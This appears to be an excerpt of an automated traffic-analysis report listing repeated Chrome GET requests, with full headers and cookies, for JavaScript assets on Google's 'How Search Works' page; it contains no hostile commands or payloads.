NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/BhmWRCy0.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/0-7k4-1q.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/vQ8El_Rl.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/u4Ay35bP.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/NticlS_l.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/bS7WqXuL.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/IniIGeRU.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/44SUZn7a.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/u_mMVaZ5.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/?fg=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/ycaG4YXp.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/vjYgswK-.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/hIvGK13F.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/0XPwTFcg.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/vjYgswK-.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/J8wBfiw3.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/zRFBfJZH.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/EWy3lfep.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/0-7k4-1q.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/p9kcPq91.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/v6TSeaUt.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/u4Ay35bP.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/IYoTYjYE.min.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.google.com/search/howsearchworks/assets/_OAi-NRQ.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
            Source: global trafficHTTP traffic detected: GET /search/howsearchworks/assets/NticlS_l.min.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
